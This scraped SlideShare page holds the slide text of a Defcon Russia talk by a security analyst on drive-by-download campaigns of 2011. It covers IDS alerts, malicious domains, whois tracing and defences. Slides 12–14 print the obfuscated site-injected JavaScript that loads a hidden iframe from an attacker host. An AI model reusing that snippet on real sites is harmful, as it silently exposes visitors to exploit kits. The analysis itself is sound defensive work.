Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Último

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 

Último (20)

Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 

Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes

  • 1. Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure Vladimir B. Kropotov TBINFORM (TNK-BP Group)
  • 2. Drive-By-Download • Hackers distribute malware by "poisoning" legitimate websites • Hacker injects malicious iframes into HTML content • Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used You just want information by attacker about insurance, nothing more, but…
  • 3. What does it look like? Host ready Malware Malware server controlled by attacker PC connected to the Internet Exploit OS, browser plugins, etc. INFO Exploit server controlled by attacker Known server with Intermediate server iframe controlled by attacker
  • 4. How we find it? Date/Time 2011-08-05 10:44:53 YEKST Tag Name PDF_XFA_Script Observance Type Intrusion Detection Cleared Flag false Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Target Service unknown Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eeb b038bd46a63e08665f308 1fb408/6cd14aca5927118 2c8a04159f9ad2804.pdf
  • 5. DOES USER NEED IT?? How we find it? Date/Time 2011-08-05 10:44:53 Tag Name PDF_XFA_Script Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eebb 038bd46a63e08665f3081 fb408/6cd14aca59271182 c8a04159f9ad2804.pdf
  • 6. First indicators Date/Time 2011-07-26 11:24:37 Tag Name PDF_XFA_Script arg 3592ba48df0fae9e5f5c5b09535a 070d0b04020600510f0c56075c0 6040750 compressed zlib server mamjhvbw.dyndns.pro URL /ghqlv3ym/
  • 7. First indicators Date/Time 2011-08-16 13:24:44 Tag Name ActiveX_Warning :clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server skipetar.in URL /jb/pda.js Date/Time 2011-08-18 19:00:13 Tag Name ActiveX_Warning clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server e1in.in URL /stat/574a353789f/pda.js
  • 8. First indicators Date/Time 2011-08-09 10:17:14 Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 compressed gzip server inaptly.in URL /jb/lastrger.php Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root :compressed gzip compressed zlib :server oligist.in server e1in.in URL /stat/574a353789f/lastrger.php :URL /jb/lastrger.php
  • 9. First indicators Date/Time 2011-07-26 11:24:37 Date/Time 2011-08-09 10:17:14 Date/Time 2011-08-16 13:24:44 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 Tag Name ActiveX_Warning compressed gzip :clsid CAFEEFAC-DEC7-0000-0000- arg 3592ba48df0fae9e5f5c5b09535a ABCDEFFEDCBA 070d0b04020600510f0c56075c0 server inaptly.in 6040750 compressed zlib server skipetar.in server mamjhvbw.dyndns.pro URL /jb/lastrger.php URL /jb/pda.js URL /ghqlv3ym/ Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name ActiveX_Warning Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root clsid CAFEEFAC-DEC7-0000-0000- :compressed gzip compressed zlib ABCDEFFEDCBA :server oligist.in server e1in.in server e1in.in URL /stat/574a353789f/lastrger.php URL /stat/574a353789f/pda.js :URL /jb/lastrger.php
  • 12. Example: o-strahovanie.ru SEP 02 / ============ bbb ============document.xmlSettings.if_ik=false;if(window.localS torage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=docu ment.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.ti me(),{ expires:(document.xmlSettings.time() + 86400*365) }); Cookie: document.xmlSettings.iframe=document.createElement ('iframe'); if_ik1315314771 document.xmlSettings.iframe.style.cssText='height:1px; www.o-strahovanie.ru/ position:absolute;width:1px;border:none;left:- 5000px;'; 16004293056256333102392 document.body.appendChild(document.xmlSettings.ifra 93001403230174358* me); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'a rding.i'+'n/xtqd2/08.p'+'hp';}
  • 13. Example: o-strahovanie.ru / ============ bbb ============ else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ document.xmlSettings.iframe= document.createElement('iframe'); document.xmlSettings.iframe.style.cssText= 'height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings. iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} Cookie: if_ik1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
  • 14. Example: o-strahovanie.ru else{// 4 osel … document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src= 'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} iframe.src= 'http://disregarding.in/xtqd2/08.php'
  • 15. Drive By Download o-strahovanie.ru Sep 02 NO Host ready Malware Malware server PC connected to the Internet Exploit NO OS, browser plugins, etc. INFO Exploit server Known server with Intermediate server iframe disregarding.in
  • 16. Drive By Download o-strahovanie.ru Sep 12 Host ready Malware Malware server chamberwoman.in PC connected to janiculum.in the Internet Exploit OS, browser plugins, etc. INFO Exploit server chamberwoman.in janiculum.in Known server with Intermediate server iframe disregarding.in
  • 17. Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario
  • 18. Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario No Payload, because No Payload Requests? Are they looking for customers?
  • 19. Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name: Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
  • 20. Russell Rosario Domain Name:FILTRATED.IN filtrated.in Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN) Created On:14-Jul-2011 11:09:56 UTC Registrant ID:TS_16731618 raptnesses.in Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Created On:14-Jul-2011 11:09:56 UTC Registrant City:Winter Haven Registrant State/Province:Florida tansies.in Registrant Postal Code:33830 Registrant Country:US Created On:14-Jul-2011 11:10:03 UTC Registrant Phone:+1.8635571308 Email:russellsrosario@teleworm.com But Sally Doesn't Know…
  • 21. Attack before public disclosure • Primary location for malicious sites: .IN • Physical servers location by IP-Address: Romania • Responsible person: Russell Rosario • Domains are new
  • 22. Domain owner is the same Domain Name Created On Registrant Name irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario 20-Jul-2011 Acrobat Vulnerability vendor notified
  • 23. Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability X. DISCLOSURE TIMELINE ----------------------------- 2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers 2011-09-14 - Public disclosure ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-26 - Coordinated public release of advisory ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-27 - Coordinated public release of advisory
  • 24. Harvetering machine started Domain Name Created On Registrant Name microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
  • 25. But may be someone knows? • Spamlists • AV Vendors • Safebrowsing • Securityfocus
  • 29. Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM Subject: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack! Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa2 4nw91yhoszkdmoh413ywv6cp7"
  • 30. PDF vulnerabilities public disclosure Sep 14. What to expect?
  • 31. PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
  • 32. No good news. Hundreds of domains were registered ITALIA-NEW.IN KLERK-EVEN.RU BANER-KLERK.RU KLERK-EVENTS.RU BANK-KLERK.RU KLERK-LAW.RU BANNER-KLERK.RU KLERK-NEW.RU BLOGS-KLERK.RU KLERK-NEWS.RU BUH-KLERK.RU KLERK-REKLAMA.RU DAILY-KP.RU KLERK-RU.RU FORUM-KLERK.RU KLERK-WORK.RU I-OBOZREVATEL.RU KLERK2.RU INTERFAX-REGION.RU OBOZREVATEL-RU.RU JOB-KLERK.RU OBOZREVATELRU.RU KLERK-BANK.RU WIKI-KLERK.RU KLERK-BANKIR.RU PRESS-RZD.RU KLERK-BIZ.RU RZD-RZD.RU KLERK-BOSS.RU IPGEOBASE.IN KLERK-BUH.RU ***
  • 33. “New generation” Host ready Malware Malware server controlled by attacker PC connected to Exploit the Internet OS, browser plugins, etc. INFO Exploit server controlled by attacker Intermediate server controlled by attacker Known server with Other known server iframe NOT controlled by attacker
  • 34. Attack after public disclosure • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,… • Physical servers location by IP-Address: International • Domains registered to different spurious persons • Domain lifetime ~ time to Blacklists appearance • Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique) • If you don't know exact malware URL, site redirects to well known server • Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
  • 35. Known sites examples: RZD.RU Russian rail roads
  • 37. Known sites examples: RZD.RU Russian rail roads
  • 39. Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
  • 41. Other examples: EG.RU (newspaper, 263 685 visits per day)
  • 42. Other examples: svpressa.ru (newspaper 276 720 visits per day)
  • 45. Another news, another phone… • Legal • Faked
  • 56. What can we do? • Patch endpoint • Tighten the Internet filtering (default deny if possible) • No Internet surfing with admin rights • See what’s happening (continuous monitoring) • Check if you’re well (regular technical audits) • Educate people
  • 57. Credits • Sergey V. Soldatov, TBINFORM (TNK-BP Group) • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group) • Wayne Huang, ARMORIZE
  • 58. THE END Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group) vbkropotov@tnk-bp.com kropotov@ieee.org